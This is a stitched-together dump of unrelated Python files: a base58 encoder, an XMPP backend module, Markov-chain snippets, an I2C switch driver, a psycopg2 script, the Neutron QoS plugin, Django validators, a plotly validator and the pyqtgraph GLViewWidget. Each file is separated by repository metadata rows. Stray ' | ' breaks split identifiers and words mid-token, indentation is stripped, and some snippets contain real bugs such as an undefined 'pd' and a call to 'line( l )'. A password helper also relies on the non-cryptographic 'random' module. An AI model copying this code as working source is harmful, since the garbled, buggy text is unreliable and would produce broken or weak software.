## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You
## may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distr | ibuted under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
## | implied. See the License for the specific language governing
## permissions and limitations under the License.
##
"""docstring goes here""" # :-)
# spec: http://www.flickr.com/groups/api/discuss/72157616713786392/
# Flickr-style base58 alphabet: digits and letters minus 0, O, I and l,
# which are easily misread. Spec: flickr short-URL discussion (see module
# docstring link).
__b58chars = '123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
__b58base = len(__b58chars)  # 58, derived so the alphabet stays authoritative


def b58encode(value):
    """
    encode non-negative integer 'value' as a base58 string; returns string

    Raises ValueError for negative input (previously produced a garbage
    string via Python's negative indexing).
    """
    if value < 0:
        raise ValueError('b58encode requires a non-negative integer')
    encoded = ''
    while value >= __b58base:
        value, mod = divmod(value, __b58base)
        encoded = __b58chars[mod] + encoded  # add to left
    return __b58chars[value] + encoded  # most significant remainder


def b58decode(encoded):
    """
    decodes base58 string 'encoded' to return integer

    Raises ValueError (from str.index) if 'encoded' contains a character
    outside the base58 alphabet.
    """
    value = 0
    column_multiplier = 1
    # Walk from least- to most-significant column.
    for c in encoded[::-1]:
        value += __b58chars.index(c) * column_multiplier
        column_multiplier *= __b58base
    return value
if __name__ == '__main__':
x = b58encode(12345678)
print x, '26gWw'
print b58decode(x), 12345678
|
mathiasertl/xmpp-backends | xmpp_backends/base.py | Python | gpl-3.0 | 21,732 | 0.002761 | # This file is part of xmpp-backends (https://github.com/mathiasertl/xmpp-backends).
#
# xmpp-backends is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# xmpp-backends is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along with xmpp-backends. If not, see
# <http://www.gnu.org/licenses/>.
"""Common code for XMPP backends."""
import ipaddress
import logging
import random
import re
import string
import time
from datetime import datetime
from datetime import timedelta
from importlib import import_module
import pytz
from .constants import CONNECTION_HTTP_BINDING
from .constants import CONNECTION_UNKNOWN
from .constants import CONNECTION_XMPP
log = logging.getLogger(__name__)
class BackendError(Exception):
"""All backend exceptions should be a subclass of this exception."""
pass
class InvalidXmppBackendError(BackendError):
"""Raised when a module cannot be imported."""
pass
class BackendConnectionError(BackendError):
"""Raised when the backend is unavailable."""
pass
class NotSupportedError(BackendError):
"""Raised when a backend does not support a specific function.
This error may be thrown only with specific versions, e.g. if it requires minimum version.
"""
pass
class UserExists(BackendError):
"""Raised when a user already exists."""
pass
class UserNotFound(BackendError):
"""Raised when a user is not found."""
def __init__(self, node, domain, resource=None):
self.node = node
self.domain = domain
self.resource = resource
def __str__(self):
s = '%s@%s' % (self.node, self.domain)
if self.resource is not None:
s += '/%s' % self.resource
return s
class UserSession(object):
"""An object describing a user session.
:param backend: The XMPP backend used for retrieving this session.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the user.
:param priority: The priority of this connection.
:param ip_address: The IP address of this connection.
:param uptime: A timestamp of when this connection came online.
:param status: The status message for this connection (e.g. "I am available.").
:param connection_type: The type of connection.
:param encrypted: If this connection is encrypted. This may be ``None`` if the backend is not able
decide if the connection is encrypted (e.g. if it is a HTTP bind connection).
:param compressed: If this connection uses XMPP stream compression. This is always ``None`` for
connections where this is not applicable, e.g. Websocket connections.
"""
def __init__(self, backend, username, domain, resource, priority, ip_address, uptime, status, status_text,
connection_type, encrypted, compressed):
self._backend = backend
self.username = username
self.domain = domain
self.jid = '%s@%s' % (username, domain)
self.resource = resource
self.priority = priority
self.ip_address = ip_address
self.uptime = uptime
self.status = status
self.status_text = status_text
self.connection_type = connection_type
self.encrypted = encrypted
self.compressed = compressed
def __eq__(self, other):
return isinstance(other, UserSession) and self.jid == other.jid and self.resource == other.resource
def __hash__(self):
return hash((self.jid, self.resource))
def __str__(self):
return '%s@%s/%s' % (self.username, self.domain, self.resource)
def __repr__(self):
return '<UserSession: %s@%s/%s>' % (self.username, self.domain, self.resource)
class XmppBackendBase(object):
"""Base class for all XMPP backends."""
library = None
"""Import-party of any third-party library you need.
Set this attribute to an import path and you will be able to access the module as ``self.module``. This
way you don't have to do a module-level import, which would mean that everyone has to have that library
installed, even if they're not using your backend.
:param version_cache_timeout: How long the API version for this backend will be cached.
:type version_cache_timeout: int or timedelta
"""
_module = None
minimum_version = None
version_cache_timeout = None
version_cache_timestamp = None
version_cache_value = None
def __init__(self, version_cache_timeout=3600):
if isinstance(version_cache_timeout, int):
version_cache_timeout = timedelta(seconds=version_cache_timeout)
self.version_cache_timeout = version_cache_timeout
super(XmppBackendBase, self).__init__()
@property
def module(self):
"""The module specified by the ``library`` attribute."""
if self._module is None:
if self.library is None:
raise ValueError(
"Backend '%s' doesn't specify a library attribute" % self.__class__)
try:
if '.' in self.library:
mod_path, cls_name = self.library.rsplit('.', 1)
mod = import_module(mod_path)
self._module = getattr(mod, cls_name)
else:
self._module = import_module(self.library)
except (AttributeError, ImportError):
raise ValueError("Couldn't load %s backend library" % cls_name)
return self._module
def datetime_to_timestamp(self, dt):
"""Helper function to convert a datetime object to a timestamp.
If datetime instance ``dt`` is naive, it is assumed that it is in UTC.
In Python 3, this just calls ``datetime.timestamp()``, in Python 2, it substracts any timezone offset
and returns the difference since 1970-01-01 00:00:00.
Note that the function always returns an int, even in Python 3.
>>> XmppBackendBase().datetime_to_timestamp(datetime(2017, 9, 17, 19, 59))
1505678340
>>> XmppBackendBase().datetime_to_timestamp(datetime(1984, 11, 6, 13, 21))
468595260
:param dt: The datetime object to convert. If ``None``, returns the current time.
:type dt: datetime
:return: The seconds in UTC.
:rtype: int
"""
if dt is None:
return int(time.time())
if not dt.tzinfo:
dt = pytz.utc.localize(dt)
return int(dt.timestamp())
def get_random_password(self, length=32, chars=None):
"""Helper function that gets a random password.
:param length: The length of the random password.
:type length: int
:param chars: A string with characters to choose from. Defaults to all ASCII letters and digits.
:type chars: str
"""
if chars is None:
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(length))
@property
def api_version(self):
"""Cached version of :py:func:`~xmpp_backends.base.X | mppBackendBase.get_api_version`."""
now = datetime.utcnow()
if self.version_cache_timestamp and self.version_cache_timestamp + self.version_cache_timeout > now:
return self.version_cache_value # we have a cached value
self.version_cache_value = self.get_api_version()
if self.minimum_version and self.version_cache_value < self.minimum_v | ersion:
raise NotSupportedError('%s requires ejabberd >= %s' % (self.__class__.__name__,
|
Gurulhu/Reborn | features/chat/markov_creation_snippets.py | Python | mit | 895 | 0.086034 | f = open("taylor.txt")
lines = f.read().split("\n")
f.close()
words = []
for i in lines:
words.extend( i. | split(" ") )
words = pd.Dataframe( words )
words = words[0].unique()
db = {}
for word in words:
db.update( { word : { "_word" : word } } )
db.update( {"_begin" : {"_word" : "_begin" } } )
for i in lines:
line = i.split(" ")
try:
n = db["_begin"][line[0]]
except:
n = 0
db["_begin"].update( { line[0] : n + 1 } )
for j in range( 1, len( line ) - 1 ):
try:
n = db[line[j-1]][line[j]]
except:
n = 0
db[line[ | j-1]].update( { line[j] : n + 1 } )
l = len( line ) - 1
try:
n = db[ line( l ) ]["_end"]
except:
n = 0
db[ line[ l ]].update( {"_end" : n + 1} )
print( line, line[l] )
result = collection.insert_many( [db[i] for i in db.keys() ] )
|
south-coast-science/scs_dfe_eng | src/scs_dfe/gas/scd30/pca9543a.py | Python | mit | 1,642 | 0.003654 | """
Created on 19 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
Two-Channel I2C-Bus Switch With Interrupt Logic and Reset
https://www.ti.com/product/PCA9543A
"""
from scs_host.bus.i2c import I2C
# --------------------------------------------------------------------------------------------------------------------
class PCA9543A(object):
"""
classdocs
"""
___I2C_ADDR = 0x70
# ----------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Constructor
"""
self.__addr = self.___I2C_ADDR
# -------------------- | --------------------------------------------------------------------------------------------
def enable | (self, ch0, ch1):
ch0_en = 0x01 if ch0 else 0x00
ch1_en = 0x02 if ch1 else 0x00
ctrl = ch1_en | ch0_en
try:
I2C.Sensors.start_tx(self.__addr)
I2C.Sensors.write(ctrl)
finally:
I2C.Sensors.end_tx()
def read(self):
try:
I2C.Sensors.start_tx(self.__addr)
ctrl = I2C.Sensors.read(1)
finally:
I2C.Sensors.end_tx()
return ctrl
def reset(self):
self.enable(False, False)
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
try:
ctrl = "0x%02x" % self.read()
except OSError:
ctrl = None
return "PCA9543A:{addr:0x%02x, ctrl:%s}" % (self.__addr, ctrl)
|
E2i9/Virdi_Server | functions/set_vagas_apto.py | Python | agpl-3.0 | 1,071 | 0.004669 | import psycopg2.extensions
from operator import add
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
with psycopg2.connect(database="reserva", user="cezar") as conn_pg:
with conn_pg.cursor() as conn_pgs:
conn_pgs.execute("select name from occ_apto;")
aptos = reduce(add, conn_pgs.fetchall())
for apto in aptos:
with conn_pg.cursor() as conn_pgs2:
conn_pgs2.execute("select id from occ_vaga_moto where name = (%s);", (apto,))
_vaga = conn_pgs2.fetchone()
with conn_pg.cursor() as conn_pgs3:
conn_pgs3.execute("update occ_apto set vaga_moto_id = (%s) where name = (%s);", (_vaga, apto,))
with conn_pg.cursor() as conn_pgs4:
conn_pgs4.execute("select id from occ_vaga_carro where nam | e = (%s);", (apto,))
_vaga = conn_pgs4.fetchone()
with conn_pg.cursor() as conn_pgs5:
conn_pgs5.execute("update | occ_apto set vaga_carro_id = (%s) where name = (%s);", (_vaga, apto,))
|
jacknjzhou/neutron | neutron/services/qos/qos_plugin.py | Python | apache-2.0 | 7,356 | 0.000136 | # Copyright (c) 2015 Red Hat Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import db_base_plugin_common
from neutron.extensions import qos
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.objects.qos import rule_type as rule_type_object
from ne | utron.services.qos.notification_drivers import manager as driver_mgr
LOG = logging.getLogger(__name__)
class QoSPlugin(qos.QoSPluginBase):
"""Implementation of the Neutron QoS Service Plugin.
This class implements a Quality of Service plugin that
provides quality of service parameters over ports and
networks.
"""
supported_extension_aliases = ['qos']
def __init__(self):
super(QoSPlugin, self | ).__init__()
self.notification_driver_manager = (
driver_mgr.QosServiceNotificationDriverManager())
@db_base_plugin_common.convert_result_to_dict
def create_policy(self, context, policy):
policy = policy_object.QosPolicy(context, **policy['policy'])
policy.create()
self.notification_driver_manager.create_policy(context, policy)
return policy
@db_base_plugin_common.convert_result_to_dict
def update_policy(self, context, policy_id, policy):
policy = policy_object.QosPolicy(context, **policy['policy'])
policy.id = policy_id
policy.update()
self.notification_driver_manager.update_policy(context, policy)
return policy
def delete_policy(self, context, policy_id):
policy = policy_object.QosPolicy(context)
policy.id = policy_id
self.notification_driver_manager.delete_policy(context, policy)
policy.delete()
def _get_policy_obj(self, context, policy_id):
obj = policy_object.QosPolicy.get_by_id(context, policy_id)
if obj is None:
raise n_exc.QosPolicyNotFound(policy_id=policy_id)
return obj
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy(self, context, policy_id, fields=None):
return self._get_policy_obj(context, policy_id)
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policies(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
return policy_object.QosPolicy.get_objects(context, **filters)
#TODO(QoS): Consider adding a proxy catch-all for rules, so
# we capture the API function call, and just pass
# the rule type as a parameter removing lots of
# future code duplication when we have more rules.
@db_base_plugin_common.convert_result_to_dict
def create_policy_bandwidth_limit_rule(self, context, policy_id,
bandwidth_limit_rule):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule(
context, qos_policy_id=policy_id,
**bandwidth_limit_rule['bandwidth_limit_rule'])
rule.create()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
return rule
@db_base_plugin_common.convert_result_to_dict
def update_policy_bandwidth_limit_rule(self, context, rule_id, policy_id,
bandwidth_limit_rule):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule(
context, **bandwidth_limit_rule['bandwidth_limit_rule'])
rule.id = rule_id
rule.update()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
return rule
def delete_policy_bandwidth_limit_rule(self, context, rule_id, policy_id):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule(context)
rule.id = rule_id
rule.delete()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy_bandwidth_limit_rule(self, context, rule_id,
policy_id, fields=None):
# make sure we have access to the policy when fetching the rule
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule.get_by_id(
context, rule_id)
if not rule:
raise n_exc.QosRuleNotFound(policy_id=policy_id, rule_id=rule_id)
return rule
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy_bandwidth_limit_rules(self, context, policy_id,
filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False):
# make sure we have access to the policy when fetching rules
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
self._get_policy_obj(context, policy_id)
return rule_object.QosBandwidthLimitRule.get_objects(context,
**filters)
# TODO(QoS): enforce rule types when accessing rule objects
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_rule_types(self, context, filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False):
return rule_type_object.QosRuleType.get_objects(**filters)
|
vesta33/aa-test | MyClip.py | Python | gpl-2.0 | 212 | 0.023585 | __author__ = 'anastas | sias'
import os
#python MyClip.py kopeerib clipboardi programmi output
def addToClipBoard():
command = 'python Isikukood_new.py | clip'
| os.system(command)
#example
addToClipBoard() |
bczmufrn/frequencia | frequencia/calendario/models.py | Python | mit | 326 | 0.030675 | from django.db import models
from frequencia.core.base | model import basemodel
class FeriadoCalendarioAcademico(basemodel):
nome = models.CharField('Nome | ', max_length=100)
data = models.DateField('Data')
def __str__(self):
return self.nome
class Meta:
verbose_name = 'Feriado'
verbose_name_plural = 'Feriados'
|
petrushev/txplaya | txplaya/player.py | Python | gpl-3.0 | 13,214 | 0.001059 | from decimal import Decimal
from collections import deque
import gc
from uuid import uuid4
from operator import itemgetter
import json
from twisted.internet import reactor
from twisted.internet.task import deferLater
from twisted.python import log
from txplaya.library import Library
from txplaya.lastfm import getScrobbler
from txplaya.track import Track
ITER_TIME = 0.2
HISTORY_CHUNKS = 4
itemgetter0 = itemgetter(0)
def logErr(failure):
failure.printTraceback()
class TxPlayaError(Exception): pass
class PlaylistError(TxPlayaError): pass
class PlaylistFinished(PlaylistError): pass
class ListenerRegistry(object):
def __init__(self):
self._reg = {}
def add(self, listener):
self._reg[id(listener)] = listener
def remove(self, listener):
del self._reg[id(listener)]
def onPlaylistFinished(self):
log.msg('ListenerRegistry::onPlaylistFinished not implemented')
def iterListeners(self):
for listener in self._reg.itervalues():
yield listener
class Player(object):
playing = False
paused = False
data = deque()
history = deque()
currentSize = 0
def __init__(self):
self._garbageCollect()
def _garbageCollect(self):
_bytes = gc.collect()
if _bytes == 0:
interval = 3000
else:
interval = 1000
_d = deferLater(reactor, interval, self._garbageCollect)
#log.msg('Garbage collected %d' % bytes_)
def feed(self, track, clear=False):
if clear:
self.data.clear()
try:
chunks = track.dataChunks(ITER_TIME)
except IOError:
log.err('{0} can not be read'.format(repr(track)))
#self.onTrackFinished()
raise
else:
self.currentSize = sum(map(len, chunks))
self.data.extend(chunks)
def play(self):
if not self.playing or self.paused:
return
if len(self.data) == 0:
self.playing = False
self.currentSize = 0
self.onTrackFinished()
return
buf = self.data.popleft()
self.history.append(buf)
while len(self.history) > HISTORY_CHUNKS:
_ = self.history.popleft()
_d = deferLater(reactor, ITER_TIME, self.play)
_d.addErrback(logErr)
# push buffer to management
self.onPush(buf)
self._timerUpdate()
def _timerUpdate(self):
if self.currentSize == 0:
self.onTimerUpdate(0)
return
remainingSize = sum(map(len, self.data))
progressPercent = int((self.currentSize - remainingSize ) * 100.0 / self.currentSize)
# update timer
self.onTimerUpdate(progressPercent)
def start(self):
if len(self.data) == 0:
return
self.onStart()
if self.playing and not self.paused:
return
self.playing = True
self.paused = False
self.play()
def stop(self):
self.data = deque()
self.history = deque()
self.playing = False
self.paused = False
self.onStop()
def pause(self):
self.paused = True
self.onPaused(True)
def resume(self):
self.paused = False
self.play()
self.onPaused(False)
def onPush(self, buf):
log.err('Player not attached')
def onStart(self):
log.err('Player not attached')
def onTrackFinished(self):
log.err('Player not attached')
def onStop(self):
log.err('Player not attached')
def onTimerUpdate(self):
log.err('Player not attached')
def onPaused(self):
log.err('Player not attached')
class Playlist(object):
_reg = {}
_order = {}
_currentUid = None
_undos = deque()
_redos = deque()
def iterTrackUid(self):
keys = sorted(self._order.keys())
for dposition in keys:
trackUid = self._order[dposition]
yield trackUid
def iterTrack(self):
for trackUid in self.iterTrackUid():
yield self._reg[trackUid]
@property
def playlistData(self):
data = (track.meta for track in self.iterTrack())
data = [meta for meta in data if meta is not None]
return data
@property
def _paths(self):
return [track._path for track in self.iterTrack()]
def insert(self, track, position=None, emit=True):
if self._reg == {}:
dposition = Decimal(1)
elif position is None or position >= len(self._order):
dposition = max(self._order.keys()) + 1
elif position == 0:
dposition = min(self._order.keys()) / 2
else: # 0 < position < len_reg
keys = sorted(self._order.keys())
dposition = (keys[position - 1] + keys[position]) / 2
trackUid = uuid4()
self._reg[trackUid] = track
self._order[dposition] = trackUid
if emit:
self.onChanged()
def mark(self):
self._undos.append((dict(self._reg), dict(self._order)))
self._redos.clear()
def undo(self):
if not self.hasUndo:
return
self._redos.appendleft((dict(self._reg), dict(self._order)))
self._reg, self._order = self._undos.pop()
if self._currentUid not in self._reg:
self._currentUid = None
self.onChanged()
def redo(self):
if not self.hasRedo:
return
self._undos.append((dict(self._reg), dict(self._order)))
self._reg, self._order = self._redos.popleft()
if self._currentUid not in self._reg:
self._currentUid = None
self.onChanged()
@property
def hasUndo(self):
return len(self._undos) > 0
@property
def hasRedo(self):
return len(self._redos) > 0
def remove(self, position, emit=True):
keys = sorted(self._order.keys())
dposition = keys[position]
trackUid = self._order[dposition]
self.mark()
del self._order[dposition]
del self._reg[trackUid]
if trackUid == self._currentUid:
self._currentUid = None
if emit:
self.onChanged()
def move(self, origin, target, emit=True):
if origin == target or origin + 1 == target:
return
keys = sorted(self._order.keys())
dpositionOrigin = keys[origin]
trackUid = self._order[dpositionOrigin]
if target == 0:
dpositionTarget = keys[0] / 2
elif target >= len(self._order):
dpositionTarget = max(self._order.keys()) + 1
else:
dpositionTarget = (keys[target] + keys[target - 1]) / 2
self.mark()
del self._order[dpositionOrigin]
self._order[dpositionTarget] = trackUid
if emit:
self.onChanged()
def clear(self):
self.mark()
self._order.clear()
self._reg.clear()
self._currentUid = None
self.onChanged()
@property
def currentPosition(self):
if self._currentUid is None:
return None
keys = sorted(self._order.items(), key=itemgetter0)
for position, (_, trackUid) in enumerate(keys):
if trackUid == self._currentUid:
return position
raise PlaylistError, 'current uid not in _reg'
@property |
def currentTrack(self):
if self._currentUid is None:
return None
return self._reg[self._currentUid]
def start(self, position=None):
if self._reg == {}:
raise Playlis | tError, 'Empty playlist'
if position >= len(self._reg) or position < 0:
raise PlaylistError, 'Position out of bounds'
if position is None:
position = 0
keys = sorted(self._order.keys())
dposition = keys[position]
trackUid = self._order[dposition]
self._currentUid = trackUid
def stop(self):
self._currentUid = None
def stepNext(self):
position = self.currentPosition
if |
MounirMesselmeni/django | django/core/validators.py | Python | bsd-3-clause | 15,107 | 0.00278 | from __future__ import unicode_literals
import re
from django.core.exceptions import ValidationError
from django.utils import six
from django.utils.deconstruct import deconstructible
from django.utils.encoding import force_text
from django.utils.functional import SimpleLazyObject
from django.utils.ipv6 import is_valid_ipv6_address
from django.utils.six.moves.urllib.parse import urlsplit, urlunsplit
from django.utils.translation import ugettext_lazy as _, ungettext_lazy
# These values, if given to validate(), will trigger the self.required check.
EMPTY_VALUES = (None, '', [], (), {})
def _lazy_re_compile(regex, flags=0):
"""Lazily compile a regex with flags."""
def _compile():
# Compile the regex if it was not passed pre-compiled.
if isinstance(regex, six.string_types):
return re.compile(regex, flags)
else:
assert not flags, "flags must be empty if regex is passed pre-compiled"
return regex
return SimpleLazyObject(_compile)
@deconstructible
class RegexValidator(object):
regex = ''
message = _('Enter a valid value.')
code = 'invalid'
inverse_match = False
flags = 0
def __init__(self, regex=None, message=None, code=None, inverse_match=None, flags=None):
if regex is not None:
self.regex = regex
if message is not None:
self.message = message
if code is not None:
self.code = code
if inverse_match is not None:
self.inverse_match = inverse_match
if flags is not None:
self.flags = flags
if self.flags and not isinstance(self.regex, six.string_types):
raise TypeError("If the flags are set, regex must be a regular expression string.")
self.regex = _lazy_re_compile(self.regex, self.flags)
def __call__(self, value):
"""
Validates that the input matches the regular expression
if inverse_match is False, otherwise raises ValidationError.
"""
if not (self.inverse_match is not bool(self.regex.search(
force_text(value)))):
raise ValidationError(self.message, code=self.code)
def __eq__(self, other):
return (
isinstance(other, RegexValidator) and
self.regex.pattern == other.regex.pattern and
self.regex.flags == other.regex.flags and
(self.message == other.message) and
(self.code == other.code) and
(self.inverse_match == other.inverse_match)
)
def __ne__(self, other):
return not (self == other)
@deconstructible
class URLValidator(RegexValidator):
ul = '\u00a1-\uffff' # unicode letters range (must be a unicode string, not a raw string)
# IP patterns
ipv4_re = r'(?:25[0-5]|2[0-4]\d|[0-1]?\d?\d)(?:\.(?:25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}'
ipv6_re = r'\[[0-9a-f:\.]+\]' # (simple regex, validated later)
# Host patterns
hostname_re = r'[a-z' + ul + r'0-9](?:[a-z' + ul + r'0-9-]*[a-z' + ul + r'0-9])?'
domain_re = r'(?:\.(?!-)[a-z' + ul + r'0-9-]+(?<!-))*'
tld_re = r'\.(?:[a-z' + ul + r']{2,}|xn--[a-z0-9]+)\.?'
host_re = '(' + hostname_re + domain_re + tld_re + '|localhost)'
regex = _lazy_re_compile(
r'^(?:[a-z0-9\.\-\+]*)://' # scheme is validated separately
r'(?:\S+(?::\S*)?@)?' # user:pass authentication
r'(?:' + ipv4_re + '|' + ipv6_re + '|' + host_re + ')'
r'(?::\d{2,5})?' # port
r'(?:[/?#][^\s]*)?' # resource path
r'\Z', re.IGNORECASE)
message = _('Enter a valid URL.')
schemes = ['http', 'https', 'ftp', 'ftps']
def __init__(self, schemes=None, **kwargs):
super(URLValidator, self).__init__(**kwargs)
if schemes is not None:
self.schemes = schemes
def __call__(self, value):
value = force_text(value)
# Check first if the scheme is valid
scheme = value.split('://')[0].lower()
if scheme not in self.schemes:
raise ValidationError(self.message, code=self.code)
# Then check full URL
try:
super(URLValidator, self).__call__(value)
except ValidationError as e:
# Trivial case failed. Try for possible IDN domain
if value:
scheme, netloc, path, query, fragment = urlsplit(value)
try:
netloc = netloc.encode('idna').decode('ascii') # IDN -> ACE
except UnicodeError: # invalid domain part
raise e
url = urlunsplit((scheme, netloc, path, query, fragment))
super(URLValidator, self).__call__(url)
else:
raise
else:
# Now verify IPv6 in the netloc part
host_match = re.search(r'^\[(.+)\](?::\d{2,5})?$', urlsplit(value).netloc)
if host_match:
potential_ip = host_match.groups()[0]
try:
validate_ipv6_address(potential_ip)
except ValidationError:
raise ValidationError(self.message, | code=self.code)
url = value
integer_validator = RegexValidator(
_lazy_re_compile('^-?\d+\Z'),
message=_('Enter a valid integer.'),
code='invalid',
)
def validate_integer(value):
return integer_validator(value)
@deconstructible
class EmailValidator(object):
message = _('Enter a valid email address.')
code = 'invalid'
user_regex = _lazy_re_compile(
| r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*\Z" # dot-atom
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-\011\013\014\016-\177])*"\Z)', # quoted-string
re.IGNORECASE)
domain_regex = _lazy_re_compile(
# max length for domain name labels is 63 characters per RFC 1034
r'((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+)(?:[A-Z0-9-]{2,63}(?<!-))\Z',
re.IGNORECASE)
literal_regex = _lazy_re_compile(
# literal form, ipv4 or ipv6 address (SMTP 4.1.3)
r'\[([A-f0-9:\.]+)\]\Z',
re.IGNORECASE)
domain_whitelist = ['localhost']
def __init__(self, message=None, code=None, whitelist=None):
if message is not None:
self.message = message
if code is not None:
self.code = code
if whitelist is not None:
self.domain_whitelist = whitelist
def __call__(self, value):
value = force_text(value)
if not value or '@' not in value:
raise ValidationError(self.message, code=self.code)
user_part, domain_part = value.rsplit('@', 1)
if not self.user_regex.match(user_part):
raise ValidationError(self.message, code=self.code)
if (domain_part not in self.domain_whitelist and
not self.validate_domain_part(domain_part)):
# Try for possible IDN domain-part
try:
domain_part = domain_part.encode('idna').decode('ascii')
if self.validate_domain_part(domain_part):
return
except UnicodeError:
pass
raise ValidationError(self.message, code=self.code)
def validate_domain_part(self, domain_part):
if self.domain_regex.match(domain_part):
return True
literal_match = self.literal_regex.match(domain_part)
if literal_match:
ip_address = literal_match.group(1)
try:
validate_ipv46_address(ip_address)
return True
except ValidationError:
pass
return False
def __eq__(self, other):
return (
isinstance(other, EmailValidator) and
(self.domain_whitelist == other.domain_whitelist) and
(self.message == other.message) and
(self.code == other.code)
)
validate_email = EmailValidator()
slug_re = _lazy_re_compile(r'^[-a-zA-Z0-9_]+\Z')
validate_slug = RegexValidator(
slug_re,
_("Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens."),
'invalid'
)
slug_uni |
plotly/plotly.py | packages/python/plotly/plotly/validators/funnel/marker/colorbar/_bgcolor.py | Python | mit | 429 | 0.002331 | import _ | plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="funnel.marker.colorbar", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
| **kwargs
)
|
onlyjus/pyqtgraph | pyqtgraph/opengl/GLViewWidget.py | Python | mit | 18,189 | 0.009071 | from ..Qt import QtCore, QtGui, QtOpenGL, USE_PYQT5
from OpenGL.GL import *
import OpenGL.GL.framebufferobjects as glfbo
import numpy as np
from .. import Vector
from .. import functions as fn
##Vector = QtGui.QVector3D
ShareWidget = None
class GLViewWidget(QtOpenGL.QGLWidget):
"""
Basic widget for displaying 3D data
- Rotation/scale controls
- Axis/grid display
- Export options
"""
    def __init__(self, parent=None):
        """Initialize the GL view with default camera options and key handling."""
        global ShareWidget
        if ShareWidget is None:
            ## create a dummy widget to allow sharing objects (textures, shaders, etc) between views
            ShareWidget = QtOpenGL.QGLWidget()
        QtOpenGL.QGLWidget.__init__(self, parent, ShareWidget)
        self.setFocusPolicy(QtCore.Qt.ClickFocus)
        # Camera state consumed by projectionMatrix()/viewMatrix().
        self.opts = {
            'center': Vector(0,0,0),  ## will always appear at the center of the widget
            'distance': 10.0,         ## distance of camera from center
            'fov': 60,                ## horizontal field of view in degrees
            'elevation': 30,          ## camera's angle of elevation in degrees
            'azimuth': 45,            ## camera's azimuthal angle in degrees
                                      ## (rotation around z-axis 0 points along x-axis)
            'viewport': None,         ## glViewport params; None == whole widget
        }
        self.setBackgroundColor('k')
        self.items = []
        # Keys in this list are auto-repeated via keyTimer instead of relying
        # on OS key repeat.
        self.noRepeatKeys = [QtCore.Qt.Key_Right, QtCore.Qt.Key_Left, QtCore.Qt.Key_Up, QtCore.Qt.Key_Down, QtCore.Qt.Key_PageUp, QtCore.Qt.Key_PageDown]
        self.keysPressed = {}
        self.keyTimer = QtCore.QTimer()
        self.keyTimer.timeout.connect(self.evalKeyState)
        self.makeCurrent()
    def addItem(self, item):
        """Add a graphics item to the scene, initialize its GL state, repaint."""
        self.items.append(item)
        if hasattr(item, 'initializeGL'):
            # The item needs a current GL context to allocate its resources.
            self.makeCurrent()
            try:
                item.initializeGL()
            except:
                # Deliberately broad: checkOpenGLVersion() reports a friendlier
                # error when the driver's GL version is too old.
                self.checkOpenGLVersion('Error while adding item %s to GLViewWidget.' % str(item))
